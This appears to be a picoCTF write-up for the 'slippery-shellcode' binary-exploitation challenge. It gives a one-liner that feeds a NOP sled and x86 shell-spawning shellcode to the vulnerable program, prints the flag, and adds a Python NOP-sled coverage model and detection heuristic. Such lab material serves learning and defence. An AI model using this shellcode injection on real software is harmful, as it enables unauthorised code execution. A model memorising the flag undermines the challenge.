slippery-shellcode

Binary Exploitation - Points: 200

This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt?

vuln

vuln.c

The binary asks directly for shellcode as input, so get an x86 shellcode, for example this.

The buffer holding the shellcode is executed at a random offset, so put a NOP sled in front of the shellcode.

(python2 -c 'print("\x90"*256+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"\x90"*256)'; cat) | ./vuln
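Why the sled has to span the whole range of possible entry offsets, and how the same sled stands out in captured input, as an added Python 3 example that is not part of the original write-up. The `0xCC` bytes are a stand-in for the 28-byte payload, and the 1..256 offset range is an assumption, since the write-up only says the offset is random.

```python
NOP = 0x90

def find_nop_runs(data, min_len=32):
    """Detection heuristic: (start, length) of each run of 0x90 >= min_len."""
    runs, start = [], None
    for i, b in enumerate(data + b"\x00"):   # sentinel closes a trailing run
        if b == NOP and start is None:
            start = i
        elif b != NOP and start is not None:
            if i - start >= min_len:
                runs.append((start, i - start))
            start = None
    return runs

def entry_outcome(data, code_start, code_len, offset):
    """Classify what the CPU meets if execution begins at data[offset]."""
    if offset <= code_start:
        gap = data[offset:code_start]
        return "slides" if all(b == NOP for b in gap) else "garbage"
    if offset < code_start + code_len:
        return "mid-payload"        # entry lands inside the payload bytes
    return "past-payload"           # entry lands after the payload

def coverage(sled_len, code_len, max_offset):
    """Fraction of entry offsets 1..max_offset that reach the payload start."""
    # Constructed buffer: 0xCC bytes stand in for the payload (assumption).
    data = bytes([NOP]) * sled_len + b"\xcc" * code_len + bytes([NOP]) * sled_len
    ok = sum(entry_outcome(data, sled_len, code_len, off) == "slides"
             for off in range(1, max_offset + 1))
    return ok / max_offset

if __name__ == "__main__":
    # Same layout as the command above: 256 NOPs, 28 payload bytes, 256 NOPs.
    captured = b"\x90" * 256 + b"\xcc" * 28 + b"\x90" * 256
    print("NOP runs (start, length):", find_nop_runs(captured))
    # Assumed offset range 1..256; the write-up only says "random offset".
    print("coverage with 256-byte sled:", coverage(256, 28, 256))
    print("coverage with  64-byte sled:", coverage(64, 28, 256))
```

A long run of `0x90` in program input is a cheap signal to log or alert on, though other single-byte no-op instructions can replace it, so treat the heuristic as one indicator rather than a complete check.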

flag: picoCTF{sl1pp3ry_sh311c0d3_0fb0e7da}